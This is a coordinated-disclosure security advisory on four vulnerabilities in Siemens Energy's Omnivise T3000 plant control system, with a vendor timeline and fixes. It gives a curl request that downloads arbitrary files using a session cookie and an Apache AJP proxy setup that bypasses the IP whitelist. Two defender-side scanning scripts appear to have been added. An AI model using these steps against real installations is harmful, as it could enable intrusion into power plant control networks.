https://sploitus.com/exploit?id=PACKETSTORM:182655
SEC Consult Vulnerability Lab Security Advisory < 20241112-0 >  
=======================================================================  
title: Multiple vulnerabilities  
product: Siemens Energy Omnivise T3000  
vulnerable version: >=8.2 SP3  
fixed version: see solution section  
CVE number: CVE-2024-38876, CVE-2024-38877, CVE-2024-38878, CVE-2024-38879  
impact: High  
homepage: https://www.siemens-energy.com/global/en/home/products-services/product/omnivise-t3000.html  
found: 2024-06-02  
by: Steffen Robertz (Office Vienna)  
Andreas Kolbeck (Office Munich)  
SEC Consult Vulnerability Lab  
  
An integrated part of SEC Consult, an Eviden business  
Europe | Asia  
  
https://www.sec-consult.com  
  
=======================================================================  
  
Vendor description:  
-------------------  
"Located in 90 countries, Siemens Energy operates across the whole energy landscape.  
From conventional to renewable power, from grid technology to storage to electrifying  
complex industrial processes.  
  
Our mission is to support companies and countries with what they need to reduce  
greenhouse gas emissions and make energy reliable, affordable, and more sustainable.  
Let's energize society."
  
Source: https://www.siemens-energy.com/global/en/home/company/about.html  
  
  
Business recommendation:  
------------------------  
Siemens has released their security advisory SSA-857368, see the following URL  
for further details:  
https://cert-portal.siemens.com/productcert/html/ssa-857368.html#mitigations-section  
  
Follow the mitigation instructions communicated in Omnivise T3000 Technical News 2024-089  
and SE Controls Security Announcement 2024-01.  
  
SEC Consult highly recommends performing a thorough security review of the product,
conducted by security professionals, to identify and resolve further potential
security issues.
  
  
Vulnerability overview/description:  
-----------------------------------  
1) Local Privilege Escalation via Writable Service Binary (CVE-2024-38876)  
Insecurely configured services or the insecure configuration of their authorizations  
lead to privilege escalation vulnerabilities in the Windows operating system. It is  
possible for a low-privileged user to modify a service in such a way that it executes  
arbitrary code instead of starting the actual service. The service path is writable by  
the "Authenticated Users" group.  
Precondition for exploitation: requires authenticated local access to the Terminal Server  
of the T3000 system.  
  
2) Cleartext Storage of Passwords in Config and Log Files (CVE-2024-38877)  
Multiple files containing cleartext passwords were discovered. These can be used  
to jump from host to host and thus compromise the whole security architecture of  
the T3000 system.  
Precondition for exploitation: requires administrative local access to any server of the  
T3000 system.  
  
3) File System Access via RemoteDiagnosticView Website (CVE-2024-38878)  
The RemoteDiagnosticView application is a web application hosted on the application  
server. One parameter accepts a full path, which can be abused to download arbitrary  
files.  
Precondition for exploitation: requires administrative remote access to the Application  
server of the T3000 system.  
  
4) IP Whitelist Bypass (CVE-2024-38879)  
The application server is hosting the T3000 web application on port 8080. However,  
only the Terminal Server is whitelisted. This whitelisting can be circumvented by  
exploiting the additionally exposed Tomcat AJP service on port 8009.  
Precondition for exploitation: requires unauthenticated remote access to the Application
server of the T3000 system.
  
  
Proof of concept:  
-----------------  
1) Local Privilege Escalation via Writable Service Binary (CVE-2024-38876)  
The following path hosts a file that is used by the "DSGW Service" of the T3000 system:  
  
"E:\dsgw\gw\bin\dsgwservice.exe"  
  
The path is writable by the "Authenticated Users" group.  
  
  
2) Cleartext Storage of Passwords in Config and Log Files (CVE-2024-38877)  
Multiple files containing cleartext passwords were discovered.  
  
Terminal Server:  
* C:\Program Files\SPPA-T3000\snmpv3trap\Config.properties (only readable by Admin)  
* E:\DSGW\GW\config_PDC.properties (Passwords are Base64 encoded)  
* C:\Program Files\SPPA-T3000\Logs\AppInstallLogs\PostInstallConfigList.xml (Readable by every user)  
  
  
Application Server:  
* D:\SPPA-T3000\_framework\_jre\installvariables.properties (contains passwords of the Tomcat and MySQL services)
* D:\SPPA-T3000\Orion\install\_uninstall\installvariables.properties (contains password for MySQL service and installation)  
  
All Servers:  
All servers are being deployed via Puppet. However, the cache file is never  
cleared and contains the initial passwords of all systems of the T3000 system:  
  
"C:\Program Data\PuppetLabs\puppet\cache\client_data\catalog\<uid.json>"  
  
---------------------------------------  
[...]  
"parameters": {  
"foreman_pass": "[redacted]",  
"foreman_url": "[redacted]",  
"foreman_user": "puppet_provider",  
"is_sec": "true",  
"mpssvc_pass": "[redacted]"  
}  
[...]  
"parameters": {  
"crsphost": "XXX.XXX.XXX.XXX",  
"crsppswd": "",  
"crsprepo": "AVPatterns",  
"crspservice": "SFTP",  
"crspuser": "siem_t3000_west",  
"primary_ts": true  
}  
[...]  
"parameters": {  
[...]  
"snmpv3_authpass": "[redacted]",  
"snmpv3_privpass": "[redacted]",  
"snmpv3_user": "snmpuser",  
"snmpv3_hash": "SHA",  
"snmpv3_encrypt": "AES"  
}  
[...]  
"parameters": {  
[...]  
"cyg_server_passwd": "[redacted]",  
[...]  
"fst_appsrv_passwd": "",  
"fst_appsrv_red_hgw_ip": "XXX.XXX.XXX.XXX",  
[...]  
"icmauser_passwd": "[redacted]",  
[...]  
"opcadmin_passwd": "[redacted]",  
"operator01_passwd": "[redacted]",  
"operator02_passwd": "[redacted]",  
"operator03_passwd": "[redacted]",  
"operator04_passwd": "[redacted]",  
"operator05_passwd": "[redacted]",  
"operator06_passwd": "[redacted]",  
"operator07_passwd": "[redacted]",  
"operator08_passwd": "[redacted]",  
"operator09_passwd": "[redacted]",  
"operator10_passwd": "[redacted]",  
"operators_password": "[redacted]",  
"pdm01_passwd": "[redacted]",  
"pdm02_passwd": "[redacted]",  
"pdm03_passwd": "[redacted]",  
"pdm04_passwd": "[redacted]",  
"pdm05_passwd": "[redacted]",  
"pdm06_passwd": "[redacted]",  
"pdm07_passwd": "[redacted]",  
"pdm08_passwd": "[redacted]",  
"pdm09_passwd": "[redacted]",  
"pdm10_passwd": "[redacted]",  
"pmas_passwd": "[redacted]",  
"pmsvc_passwd": "[redacted]",  
"pmts_passwd": "[redacted]",  
"reparchive_passwd": "[redacted]",  
[...]  
"t3kservice_passwd": "[redacted]",  
[...]
"tomcatadmin_passwd": "[redacted]",  
"tsuser01_passwd": "[redacted]",  
"tsuser02_passwd": "[redacted]",  
"tsuser03_passwd": "[redacted]",  
"tsuser04_passwd": "[redacted]",  
"tsuser05_passwd": "[redacted]",  
"tsuser06_passwd": "[redacted]",  
"tsuser07_passwd": "[redacted]",  
"tsuser08_passwd": "[redacted]",  
"tsuser09_passwd": "[redacted]",  
"tsuser10_passwd": "[redacted]",  
"txpdomain_passwd": "[redacted]",  
[...]  
"vm_r8_passwd": "[redacted]",  
[...]  
"vm_tc_passwd": "[redacted]",  
[...]  
"vm_ts_passwd": "[redacted]",  
[...]  
"vm_whitelist_hostname": "",  
"vm_whitelist_passwd": "",  
"wbuser01_passwd": "[redacted]",  
"wbuser02_passwd": "[redacted]",  
"wbuser03_passwd": "[redacted]",  
"wbuser04_passwd": "[redacted]",  
"wbuser05_passwd": "[redacted]",  
"wbuser06_passwd": "[redacted]",  
"wbuser07_passwd": "[redacted]",  
"wbuser08_passwd": "[redacted]",  
"wbuser09_passwd": "[redacted]",  
"wbuser10_passwd": "[redacted]",  
"wra01_passwd": "[redacted]",  
[...]  
"dsrm_passwd": "[redacted]",  
[...]  
"dc_passwd": "[redacted]",  
[...]  
"patchsvc_passwd": "[redacted]",  
}  
--------------------------------------------------  
  
To understand the impact of this file, we have to explain a little about the T3000 system.
The system is split into three levels: Operator, Automation and Process.

Operator Level: This is the level where the thin clients are situated. In our test case,
this level consisted of the Terminal Server that engineers could connect to. From there,
they start the T3000 application, which simply loads a browser and displays a Java
application served from the Application Server.

Automation Level: This level consists of application and automation servers. The application
server hosts the non-time-critical components of power generation, such as the web server.
The automation servers handle the time-critical operations. In our test case these
were PLCs from the SIMATIC S7-CPU family.

Process Level: This level consists of the I/O modules that are controlled by the automation
servers.

The Terminal Server, located on the operator level, already contained the Puppet cache file,
which listed all the local Windows users used in the T3000 system together with their
passwords in clear text. As the Terminal Server communicates with the Application Server,
the two have to be connected via the network, so an attacker can use the credentials found on
the Terminal Server to jump to the Application Server. That server sits in the same network
segment as the physical PLC CPUs, so the attacker can now also control the PLCs and thus the
whole power plant.

In order to read the Puppet cache file, an attacker has to gain local admin rights first.
For this, vulnerability 1 can be used.
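As an added defender-side check that is not part of the advisory, the following Python script scans a Puppet client catalog JSON (the cache file discussed above) for parameters that still hold credentials, distinguishing cleartext values from merely Base64-encoded ones such as those found in config_PDC.properties. The catalog sample and all values in it are constructed, and the key-name patterns are assumptions derived from the redacted excerpt.

```python
import base64
import json
import re

# Constructed sample in the shape of the Puppet client catalog excerpt quoted
# in the advisory (resources -> parameters); every value here is made up.
SAMPLE_CATALOG = json.dumps({"resources": [
    {"title": "T3000::Foreman",
     "parameters": {"foreman_user": "puppet_provider",
                    "foreman_pass": "Winter2024!", "is_sec": "true"}},
    {"title": "T3000::Snmp",
     "parameters": {"snmpv3_user": "snmpuser", "snmpv3_hash": "SHA",
                    "snmpv3_authpass": "c2VjcmV0cGFzcw=="}},  # base64("secretpass")
    {"title": "T3000::Accounts",
     "parameters": {"operator01_passwd": "", "crsppswd": "",
                    "tomcatadmin_passwd": "[redacted]", "primary_ts": True}},
]})

# Parameter names carrying credentials in the advisory's excerpt (assumed
# pattern): *_pass, *_passwd, *_password, *pswd
SECRET_KEY = re.compile(r"(pass(word|wd)?|pswd)$", re.IGNORECASE)
B64_VALUE = re.compile(r"^[A-Za-z0-9+/]{8,}={0,2}$")


def looks_base64(value):
    """True if value is Base64 that decodes to printable text, i.e. the
    'encoded but not encrypted' form seen in config_PDC.properties."""
    if not B64_VALUE.match(value) or len(value) % 4:
        return False
    try:
        return base64.b64decode(value, validate=True).decode("ascii").isprintable()
    except (ValueError, UnicodeDecodeError):
        return False


def find_catalog_secrets(catalog_json):
    """Return (resource title, parameter, kind) for every populated secret
    parameter; kind is 'cleartext' or 'base64'. Empty values and '[redacted]'
    placeholders are skipped, so a scrubbed cache yields an empty list."""
    findings = []
    for res in json.loads(catalog_json).get("resources", []):
        for key, value in res.get("parameters", {}).items():
            if not SECRET_KEY.search(key) or not isinstance(value, str):
                continue
            if value in ("", "[redacted]"):
                continue
            kind = "base64" if looks_base64(value) else "cleartext"
            findings.append((res.get("title"), key, kind))
    return findings


if __name__ == "__main__":
    for title, key, kind in find_catalog_secrets(SAMPLE_CATALOG):
        print(f"{title}: {key} holds a {kind} secret; scrub the cache and rotate it")
```

Run it against each catalog file under the Puppet cache directory after installation; any finding means the cache still has to be cleared and the affected account password rotated.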
  
  
3) File System Access via RemoteDiagnosticView Website (CVE-2024-38878)  
The RemoteDiagnosticView website is hosted at the following URL:  
  
http://<IP Application Server>:8080/RemoteDiagnosticView
  
In our test case it was configured with default credentials, i.e. the following username
and an easy-to-guess password:
  
txpadmin:[redacted]  
  
Using these credentials an attacker gains an authenticated session. From there, one can  
simply download arbitrary files:  
  
------------------------  
curl -i -H "Cookie: JSESSIONID=31B4F2F1BAFC473AB41B65DDF2FD10BA;" \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -X POST -d "filename=D:\sectest.txt&type=TEXT" \
  http://$host:8080/RemoteDiagnosticView/DataServlet
  
  
HTTP/1.1 200  
Content-Type: text/plain  
Transfer-Encoding: chunked  
[...]  
  
Sectest  
---------------------------------  
  
  
4) IP Whitelist Bypass (CVE-2024-38879)  
The AJP protocol can be used to proxy requests from an Apache server to an application  
running on Tomcat. By setting up a local Apache server and configuring it to use the  
AJP service of the Application Server, the IP filter is circumvented.  
The following setup was built:  
  
------------------------------  
sudo apt-get install libapache2-mod-jk  
sudo vim /etc/apache2/apache2.conf  
# append the following line to the config  
Include ajp.conf  
sudo vim /etc/apache2/ajp.conf  
# create the following file  
ProxyRequests Off  
<Proxy *>  
Order deny,allow  
Deny from all  
Allow from localhost  
</Proxy>  
ProxyPass / ajp://<Application Server IP>:8009/  
ProxyPassReverse / ajp://<Application Server IP>:8009/  
sudo a2enmod proxy_http  
sudo a2enmod proxy_ajp  
sudo systemctl restart apache2  
--------------------------  
Afterwards, e.g. the RemoteDiagnosticView can be loaded from http://127.0.0.1/RemoteDiagnosticView
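As an added defender-side example (not part of the advisory or of the T3000 product), the following Python script parses a Tomcat server.xml and flags AJP connectors that listen beyond loopback or carry no shared secret. Both server.xml fragments are constructed for the example; the hardened one shows the connector settings that remove the remotely reachable AJP endpoint the bypass above relies on.

```python
import xml.etree.ElementTree as ET

# Constructed server.xml fragments (not taken from the T3000 product). The weak
# form mirrors the advisory: AJP/1.3 on 8009 bound to all interfaces, so the IP
# whitelist enforced for HTTP on 8080 does not apply to requests arriving via AJP.
WEAK_SERVER_XML = """<Server port="8005" shutdown="SHUTDOWN">
  <Service name="Catalina">
    <Connector port="8080" protocol="HTTP/1.1" connectionTimeout="20000"/>
    <Connector port="8009" protocol="AJP/1.3" redirectPort="8443"/>
  </Service>
</Server>"""

# Hardened form: AJP bound to loopback and protected by a shared secret
# (secretRequired/secret exist since Tomcat 8.5.51 and 9.0.31). If no local
# reverse proxy needs AJP at all, deleting the connector is better still.
HARDENED_SERVER_XML = """<Server port="8005" shutdown="SHUTDOWN">
  <Service name="Catalina">
    <Connector port="8080" protocol="HTTP/1.1" connectionTimeout="20000"/>
    <Connector port="8009" protocol="AJP/1.3" address="127.0.0.1"
               secretRequired="true" secret="REPLACE-WITH-RANDOM-SECRET"/>
  </Service>
</Server>"""

LOOPBACK = {"127.0.0.1", "::1", "localhost"}


def audit_ajp_connectors(server_xml):
    """Return one problem string per AJP connector issue found in server.xml;
    an empty list means every AJP connector is loopback-only and secret-protected."""
    problems = []
    for conn in ET.fromstring(server_xml).iter("Connector"):
        if not conn.get("protocol", "").upper().startswith("AJP"):
            continue
        port = conn.get("port", "?")
        address = conn.get("address")  # Tomcat binds all interfaces when absent
        if address not in LOOPBACK:
            problems.append(f"AJP connector on port {port} listens on "
                            f"{address or 'all interfaces'}; bind it to loopback")
        if not conn.get("secret"):
            problems.append(f"AJP connector on port {port} has no shared secret")
    return problems


if __name__ == "__main__":
    for label, xml in (("weak", WEAK_SERVER_XML), ("hardened", HARDENED_SERVER_XML)):
        print(label, audit_ajp_connectors(xml) or ["ok"])
```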
  
  
Vulnerable / tested versions:  
-----------------------------  
The following version has been tested, which was the latest version available
at the time of the test:
* 8.2  
  
According to the vendor (T3000 SE Controls Security Announcement 2024/01 Update 1),  
the following versions and components are affected:  
  
All T3000 Versions >= Release 8.2 SP3:  
* Security Server  
* Thin Clients  
* Terminal Server  
* Application Server  
* Domain Controller  
* PDM VM  
* Whitelisting VM  
* NIDS  
  
  
Vendor contact timeline:  
------------------------  
2024-06-05: Contacting vendor through productcert@siemens.com  
2024-06-06: Siemens assigned S-PCERT#40850  
2024-06-12: Reaching out to specific contacts at Siemens Energy Cybersecurity.  
2024-06-13: They confirm that ProductCERT will get back to us once they have a timeline.  
2024-06-19: Customer informs us about a Siemens Energy document that recommends changing
passwords after installation. The document is called "SE Controls
Security Announcement 2024/01" but is only available to T3000 customers.
2024-06-20: Sending feedback about the document to Siemens Energy Cybersecurity,
as in our opinion it does not solve the issues.
2024-06-20: They confirm again that ProductCERT is taking care of the issues and ask us
to confirm that we received their messages, which we didn't. We realized
that one of our email addresses was dropped during the communication and
recovered the emails from the second account.
2024-06-17/2024-06-24: ProductCERT informs:
Vulnerability 1 cannot be reproduced in the reference installation.
The product team is working to find potentially affected installation
scenarios.
Vulnerability 2 was reproduced and the product team is working on a mitigation.
Also, related customer information has been distributed to customers.
Vulnerability 3 will be fixed in the next release of the T3000 distribution.
Vulnerability 4 is already fixed in the current version. The product team is
investigating whether this vulnerability is present in still supported versions.
2024-06-21: ProductCERT informs us that they are able to reproduce all of the vulnerabilities
and provide fixes for most of them. An advisory draft should be shared with
SEC Consult next week. They ask us to keep communication directed at ProductCERT
instead of the Cybersecurity team.
2024-06-28: ProductCERT sends over the advisory draft. They could reproduce all vulnerabilities
and have requested CVEs.
2024-07-03: Siemens ProductCERT asks whether we received the draft, as SEC Consult hasn't answered yet.
2024-07-03: SEC Consult confirms the reception of the advisory draft.
2024-07-04: Submitted feedback for the advisory draft to ProductCERT. From SEC Consult's
understanding, changing passwords after initial installation only fixes the
cleartext passwords in log files. The Puppet issue would not be fixed.
Thus SEC Consult proposed to split Vulnerability 2 into two separate findings.
2024-07-05: ProductCERT forwarded feedback to product team.  
2024-08-02: ProductCERT publishes SSA-857368.  
2024-08-05: Informing ProductCERT of vacation/absences, will coordinate further afterwards.  
2024-10-03: Proposing a meeting with ProductCERT to clarify and discuss all open issues.  
2024-10-22: Meeting with ProductCERT.  
2024-10-24: ProductCERT sends us further documents for T3000 regarding fixes/mitigations.  
2024-10-31: Sending advisory draft to ProductCERT, proposing advisory release date for 7th  
November.  
2024-11-06: Receiving feedback from ProductCERT, postponing release to 12th November.  
2024-11-12: Coordinated release of advisory.  
  
  
Solution:  
---------  
Change the passwords of all components. Detailed instructions and patch information
can be found in Omnivise T3000 Technical News 2024-089 and SE Controls
Security Announcement 2024-01.
  
Release 9.2 Fix / Mitigations:  
Issue 1 (CVE-2024-38876)  
* System Software Patch 22.173.20  
* System Software Patch 22.173.52  
* Application Software Patch 09.0.19.06  
  
Issue 2 (CVE-2024-38877)  
* System Software Patches 22.173.52  
* Application Software Patch 09.0.19.06  
* Technical News 2024-089  
  
Issue 3 (CVE-2024-38878)  
* Application Software Patch 09.0.19.06  
  
Issue 4 (CVE-2024-38879)  
* Application Software Patch 09.0.19.06  
  
  
Release 8.2 SP4 Fix / Mitigations:  
Patches are currently under development.  
  
Release 8.2 SP3 Fix / Mitigations:  
Currently no fixes are planned, but see Technical News 2024-089 for issue 2 (CVE-2024-38877).
  
  
Workaround:  
-----------  
Limit access to the terminal servers.  
  
CVE-2024-38877: If the passwords are suspected to be compromised, change the passwords
for all computers and service accounts. In addition, follow the instructions from
Omnivise T3000 Technical News 2024-089, which is available through T3000 customer
service and applies to releases 8.2 SP3/SP4 and 9.2.
  
  
Advisory URL:  
-------------  
https://sec-consult.com/vulnerability-lab/  
  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
SEC Consult Vulnerability Lab  
An integrated part of SEC Consult, an Eviden business  
Europe | Asia  
  
About SEC Consult Vulnerability Lab  
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an  
Eviden business. It ensures the continued knowledge gain of SEC Consult in the  
field of network and application security to stay ahead of the attacker. The  
SEC Consult Vulnerability Lab supports high-quality penetration testing and  
the evaluation of new offensive and defensive technologies for our customers.  
Hence our customers obtain the most current information about vulnerabilities  
and valid recommendation about the risk profile of new technologies.  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Interested to work with the experts of SEC Consult?  
Send us your application https://sec-consult.com/career/  
  
Interested in improving your cyber security with the experts of SEC Consult?  
Contact our local offices https://sec-consult.com/contact/  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Mail: security-research at sec-consult dot com  
Web: https://www.sec-consult.com  
Blog: https://blog.sec-consult.com  
Twitter: https://twitter.com/sec_consult  
  
EOF Steffen Robertz, Andreas Kolbeck/ @2024